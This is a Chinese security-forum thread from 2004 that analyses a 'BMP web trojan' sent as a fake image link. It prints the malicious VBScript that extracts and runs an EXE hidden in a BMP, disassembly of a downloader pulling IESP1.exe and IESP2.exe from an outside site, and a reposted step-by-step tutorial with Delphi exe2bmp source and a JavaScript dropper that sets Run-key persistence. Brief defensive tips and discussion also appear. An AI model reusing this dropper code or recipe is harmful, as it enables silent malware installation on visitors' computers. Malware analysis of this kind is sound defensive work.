首页
社区
课程
招聘
某网页病毒浅析
发表于: 2004-5-14 15:26 10953

某网页病毒浅析

2004-5-14 15:26
10953

某日,一QQ好友给我发信息,说正在看一幅画,还强调没病毒,我想把链接框起来,用网络快车下载下来看,没想到一下子点进去了,防火墙蹦出来,问要不要让mshta.exe访问网络,我知道中毒了,直接禁止他,然后用网络快车下载该jpg文件看,原来是html+javascript,找到如下可疑内容:

<img src="/images/girl.jpg" width="600" height="800">
显示jpg图像,让人以为此奶一MM图片

<IMG SRC=klook.bmp width=0 height=0>
<object data="klook.ASP" width=0 height=0>
klook.bmp和klook.ASP保证有问题

于是下载klook.bmp看,确实是bmp图,但都是乱七八糟的色块,于是用UltraEdit打开看,文件头是BMP没错,壳居然发现"MZ"和"PE"字样!我明白了,他把EXE文件粘贴再BMP文件头的后面!

再下载klook.asp,内容如下:
<title>-</title>

<SCRIPT LANGUAGE="VBScript">
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
sucess=0

SearchBMPFile fso.GetFolder(CACHE),"klook[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"klook[2].bmp"

Function SearchBMPFile(Folder,fname)
   Dim SubFolder,File,Lt,tmp,winsys
   str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname');
   if FSO.FileExists(str) then
      tmp=fso.GetSpecialFolder(2) & "\"
      winsys=fso.GetSpecialFolder(1) & "\"
      set File=FSO.GetFile(str)
      File.Copy(tmp & "tmp.dat")
      On Error Resume Next
      File.Delete
      if FSO.FileExists(str) then exit function
      set Lt=FSO.CreateTextFile(tmp & "tmp.in")
      Lt.WriteLine("rbx")
      Lt.WriteLine("0")
      Lt.WriteLine("rcx")
      Lt.WriteLine("2200")
      Lt.WriteLine("w136")
      Lt.WriteLine("q")
      Lt.Close
      set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
      Lt.WriteLine("%40echo off")
      Lt.WriteLine(chr(100) & "ebug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
      Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "klook.exe>" & tmp & "tmp.out")
      Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
      Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
      Lt.WriteLine(winsys & "klook.exe")
      Lt.WriteLine("del %0")
      Lt.Close
      sucess=1
      WSH.Run tmp & "tmp.bat",false,6
      On Error Resume Next

   end if
   If Folder.SubFolders.Count <> 0 Then
      For Each SubFolder In Folder.SubFolders
         SearchBMPFile SubFolder,fname
      Next
   End If
End Function
window.close
</script>

<SCRIPT language=JavaScript>
parent.moveTo(0,0);
parent.resizeTo(0,0);
</SCRIPT>

大概是这样的:
先创建Scripting.FileSystemObject对象和WScript.Shell对象,读取IE临时文件所在地,然后搜索下载的klook.bmp文件,再把klook.bmp尾部附加的exe文件放出来执行。

下次把那个exe文件切下来反汇编一下


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 10
支持
分享
最新回复 (14)
雪    币: 291
活跃值: (400)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
2
:00403648 55                      push ebp
:00403649 8BEC                    mov ebp, esp
:0040364B 83C4F0                  add esp, FFFFFFF0
:0040364E 53                      push ebx
:0040364F 56                      push esi
:00403650 57                      push edi
:00403651 B8F0354000              mov eax, 004035F0
:00403656 E8B9FCFFFF              call 00403314
:0040365B 33C0                    xor eax, eax
:0040365D 55                      push ebp
:0040365E 68B1364000              push 004036B1
:00403663 64FF30                  push dword ptr fs:[eax]
:00403666 648920                  mov dword ptr fs:[eax], esp

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft1.exe"
                                  |
:00403669 BACC364000              mov edx, 004036CC

* Possible StringData Ref from Code Obj ->"http://www.918dj.com/IESP1.exe"
                                  |
:0040366E B8EC364000              mov eax, 004036EC
:00403673 E8B0FEFFFF              call 00403528
:00403678 84C0                    test al, al
:0040367A 740C                    je 00403688
:0040367C 6A00                    push 00000000

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft1.exe"
                                  |
:0040367E 680C374000              push 0040370C

* Reference To: KERNEL32.WinExec, Ord:0000h
                                  |
:00403683 E840FDFFFF              Call 004033C8

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040367A(C)
|

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft2.exe"
                                  |
:00403688 BA2C374000              mov edx, 0040372C

* Possible StringData Ref from Code Obj ->"http://www.918dj.com/IESP2.exe"
                                  |
:0040368D B84C374000              mov eax, 0040374C
:00403692 E891FEFFFF              call 00403528
:00403697 84C0                    test al, al
:00403699 740C                    je 004036A7
:0040369B 6A00                    push 00000000

* Possible StringData Ref from Code Obj ->"C:\windows\winsoft2.exe"
                                  |
:0040369D 686C374000              push 0040376C

* Reference To: KERNEL32.WinExec, Ord:0000h
                                  |
:004036A2 E821FDFFFF              Call 004033C8

很简单,该病毒下载http://www.918dj.com/IESP1.exe或者http://www.918dj.com/IESP2.exe并执行
2004-5-14 15:44
0
雪    币: 236
活跃值: (48)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
好东西,值得收藏,学习中……
2004-5-14 15:52
0
雪    币: 210
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
呵呵,这也敢试
2004-5-14 16:01
0
雪    币: 291
活跃值: (400)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
5
bmp病毒在此,大家有兴趣就研究一下点击下载:附件!
2004-5-14 16:03
0
雪    币: 291
活跃值: (400)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
6
他还下载两个病毒:iesp1.exe和iesp2.exe,其中iesp2.exe是自解压rar文件,里面好像居然还有还原精灵
2004-5-14 16:15
0
雪    币: 703
活跃值: (327)
能力值: (RANK:380 )
在线值:
发帖
回帖
粉丝
7
起了三个进程打算有时间看看.建议还是把微软的脚本的补丁打上这样安全多了
2004-5-14 16:20
0
雪    币: 291
活跃值: (400)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
8
最初由 kvllz 发布
起了三个进程打算有时间看看.建议还是把微软的脚本的补丁打上这样安全多了


我这个病毒,把 vb6 运行库和还原精灵都下下来了,要是真的执行还原精灵,就比你碰到的更恶毒了
2004-5-14 16:32
0
雪    币: 272
活跃值: (340)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
9
其实他的真名叫:bmp木马
其实现方法如下  转载:
首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下. 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.

   然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的javascript脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.

看上去好象很复杂,下面我们一步一步来:
1) EXE变BMP的方法.
大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下:

program exe2bmp;

uses
Windows,
SysUtils;

var len,row,col,fs: DWORD;
buffer: array[0..255]of char;
fd: WIN32_FIND_DATA;
h,hw: THandle;

begin
if (ParamStr(1)<>'''') and(ParamStr(2)<>'''') then begin //如果运行后没有两个参数则退出
if FileExists(ParamStr(1)) then begin
FindFirstFile(Pchar(ParamStr(1)),fd);
fs:=fd.nFileSizeLow;
col := 4;
while true do begin
if (fs mod 12)=0 then begin
len:=fs;
end else len:=fs+12-(fs mod 12);
row := len div col div 3;
if row>col then begin
col:=col+4;
end else Break;
end;
FillChar(buffer,256,0);
{一下为BMP文件头数据}
Buffer[0]:=''B'';Buffer[1]:=''M'';
PDWORD(@buffer[18])^:=col;
PDWORD(@buffer[22])^:=row;
PDWORD(@buffer[34])^:=len;
PDWORD(@buffer[2])^:=len+54;
PDWORD(@buffer[10])^:=54;
PDWORD(@buffer[14])^:=40;
PWORD(@buffer[26])^:=1;
PWORD(@buffer[28])^:=24;
{写入文件}
hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);
h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0);
WriteFile(hw,buffer,54,col,0);
repeat
ReadFile(h,buffer,256,col,0);
WriteFile(hw,buffer,col,col,0);
untilcol<>256;
WriteFile(hw,buffer,len-fs,col,0);
CloseHandle(h);
CloseHandle(hw);
end;
end;
end.

以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入
exe2bmp myexe.exe mybmp.bmp
回车就可以把第二个参数所指定的EXE文件转换成BMP格式.
接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式
<img srd="mybmp.bmp" higth="0" width="0">

以下是放在网页上的脚本
document.write('' '');
function docsave()
{
a=document.applets[0];
a.setCLSID(''{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'');
a.createInstance();
wsh=a.GetObject();
a.setCLSID(''{0D43FE01-F093-11CF-8940-00A0C9054228}'');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+''\\s.vbs'';
wsh.RegWrite
(''HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs'',''wscript ''+''"''+vbs+''" '');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine(''Option Explicit'');
st.WriteLine(''Dim FSO,WSH,CACHE,str'');
st.WriteLine(''Set FSO = CreateObject("Scripting.FileSystemObject")'');
st.WriteLine(''Set WSH = CreateObject("WScript.Shell")'');
st.WriteLine(''CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'');
st.WriteLine(''wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")'');
st.WriteLine (''wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"'');
st.WriteLine(''SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"'');
st.WriteLine(''WScript.Quit()'');
st.WriteLine(''Function SearchBMPFile(Folder,fname)'');
st.WriteLine('' Dim SubFolder,File,Lt,tmp,winsys'');
st.WriteLine('' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname'');
st.WriteLine('' if FSO.FileExists(str) then'');
st.WriteLine('' tmp=fso.GetSpecialFolder(2) & "\\"'');
st.WriteLine('' winsys=fso.GetSpecialFolder(1) & "\\"'');
st.WriteLine('' set File=FSO.GetFile(str)'');
st.WriteLine('' File.Copy(tmp & "tmp.dat")'');
st.WriteLine('' File.Delete'');
st.WriteLine('' set Lt=FSO.CreateTextFile(tmp & "tmp.in")'');
st.WriteLine('' Lt.WriteLine("rbx")'');
st.WriteLine('' Lt.WriteLine("0")'');
st.WriteLine('' Lt.WriteLine("rcx")'');
st.WriteLine('' Lt.WriteLine("1000")'');
st.WriteLine('' Lt.WriteLine("w136")'');
st.WriteLine('' Lt.WriteLine("q")'');
st.WriteLine('' Lt.Close'');
st.WriteLine('' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6'');
st.WriteLine('' On Error Resume Next '');
st.WriteLine('' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")'');
st.WriteLine('' FSO.GetFile(tmp & "tmp.dat").Delete'');
st.WriteLine('' FSO.GetFile(tmp & "tmp.in").Delete'');
st.WriteLine('' FSO.GetFile(tmp & "tmp.out").Delete'');
st.WriteLine('' end if'');
st.WriteLine('' If Folder.SubFolders.Count <> 0 Then'');
st.WriteLine('' For Each SubFolder In Folder.SubFolders'');
st.WriteLine('' SearchBMPFile SubFolder,fname'');
st.WriteLine('' Next'');
st.WriteLine('' End If'');
st.WriteLine(''End Function'');
st.Close();
}
setTimeout(''docsave()'',1000);

把该脚本保存为"js.js",在网页中插入:
<script src="js.js"></script>

该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。
“S.VBS”文件主要内容如下:

Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
''从临时文件夹中查找目标BMP图片
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
''生成一个DEBUG脚本
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
''下面一行的1000是十六进制,换回十进制是4096(该数字是你的EXE文件的大小)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
On Error Resume Next
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp.dat").Delete
FSO.GetFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function

这个脚本会找出在临时文件夹中的bmp文件,并生成一个DEBUG的脚本,运行时会自动从BMP文件54字节处读去你指定大小的数据,并把它保存到tmp.dat中.后面的脚本再把它复制到SYSTEM的目录下.这个被还原的EXE文件会在下次重起的时候运行.这就是BMP木马的基本实现过程.
详细脚本代码请参考http://hotsky.363.net

防范方法:
最简单,删除或改名wscrpit.exe文件和DEBUG 文件;
安装有效的杀毒软件,因为这些脚本有好多杀毒软件已经可以查出来了.
在条件允许的情况下,安装WIN2K SP3,尽量避免去一些不名来历的网站.
2004-5-15 08:18
0
雪    币: 237
活跃值: (160)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
10
呵呵,过几天我放上早些时候写的一篇也是说这个的东东吧~~
2004-5-15 16:32
0
雪    币: 279
活跃值: (266)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
该bmp木马在win2000 xp下为什么不能运行?
对注册表和文件的操作是否是利用了WScript.Shell.1和Scripting.FileSystemObject 对象没有阻止脚本环境的调用进行的?如果这样的话把浏览器的安全设置做相应调整也没用喽?

关注讨论!
2004-5-16 12:31
0
雪    币: 418
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
最初由 草原猎豹 发布
他还下载两个病毒:iesp1.exe和iesp2.exe,其中iesp2.exe是自解压rar文件,里面好像居然还有还原精灵


可能是破??原精爨的程式。
2004-5-16 14:29
0
雪    币: 207
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
每次都研究网页啊?
2004-5-16 19:23
0
雪    币: 272
活跃值: (340)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
14
刚刚浅浅的看了一下sendmess.exe病毒
很老了。我在学校机房上网,没杀毒软件。
sendmess.exe运行后将邦在自身尾部的qqmess.dll copy到c:\windows\system下并加载。将自身拷到c:\windows下,将
import表作为文本文件命名为qq32.ini拷到c:\windows下。
在注册表HKLM\Software\Microsoft\windows\currentversion\run下创建名为qq的键,指向c:\windows\sendmess.exe使之开机时运行
qq32.ini中所存的文本为qq发信息时候面加的不健康网站的网址。
并将主页改为此网址。
杀它很简单:od附加上sendmess.exe.结束进程。也可以用peid.
2004-5-16 20:37
0
雪    币: 291
活跃值: (400)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
15
最初由 chaolumen86 发布
每次都研究网页啊?


我有吗???
2004-5-16 20:47
0
游客
登录 | 注册 方可回帖
返回
//